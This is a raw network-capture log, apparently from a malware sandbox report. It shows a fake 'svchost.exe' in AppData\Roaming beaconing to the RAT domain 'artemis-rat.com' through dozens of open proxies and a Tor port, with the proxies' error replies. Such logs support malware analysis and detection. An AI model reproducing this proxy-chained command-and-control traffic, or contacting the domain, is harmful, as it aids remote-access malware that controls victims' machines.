Mar 9, 2024 13:14:28.523034096 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1974	192.168.2.5	56338	218.145.131.182	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.369407892 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1975	192.168.2.5	56341	218.145.131.182	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.370728016 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1976	192.168.2.5	56343	218.145.131.182	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.373025894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1977	192.168.2.5	55870	124.163.236.54	7302	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.374558926 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.855174065 CET	90	IN	HTTP/1.1 200 OK Content-Type: application/json Connection: close Content-Length: 55

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1978	192.168.2.5	56347	218.145.131.182	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.375118017 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1979	192.168.2.5	56197	104.16.108.204	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.376154900 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.530427933 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1980	192.168.2.5	56181	34.49.208.221	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.376332045 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1981	192.168.2.5	56204	172.67.181.12	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.379102945 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.534780025 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1982	192.168.2.5	56046	5.189.158.162	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.379607916 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.740372896 CET	39	IN	HTTP/1.1 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1983	192.168.2.5	56035	43.155.130.182	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.381726027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1984	192.168.2.5	56199	50.63.12.33	45134	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.387764931 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.848737955 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:29.442773104 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.646296978 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.833831072 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.942922115 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:37.146564007 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1985	192.168.2.5	56221	104.17.16.87	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.388410091 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.542409897 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1986	192.168.2.5	56075	121.159.146.251	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.392884970 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.693088055 CET	310	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1987	192.168.2.5	55945	103.121.39.158	1080	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.394485950 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1988	192.168.2.5	56045	8.219.177.134	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.404046059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1989	192.168.2.5	56235	45.12.31.140	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.407638073 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.562144041 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1990	192.168.2.5	56237	104.22.14.48	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.408454895 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.562627077 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1991	192.168.2.5	56240	104.16.224.33	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.412789106 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.566803932 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1992	192.168.2.5	56064	86.8.163.88	9150	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.412857056 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:30.978105068 CET	729	IN	HTTP/1.0 501 Tor is not an HTTP Proxy Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00 Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1993	192.168.2.5	56104	3.9.71.167	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.415950060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.710051060 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:28 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1994	192.168.2.5	56094	27.96.235.171	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.416080952 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.707926035 CET	326	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Sat, 09 Mar 2024 12:14:27 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1995	192.168.2.5	56168	198.199.86.11	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.422911882 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.993211985 CET	28	IN	HTTP/1.1 400 Bad Request

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1996	192.168.2.5	56256	172.67.182.107	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:28.424910069 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:28.579117060 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:28 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1997	192.168.2.5	55967	172.232.111.247	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
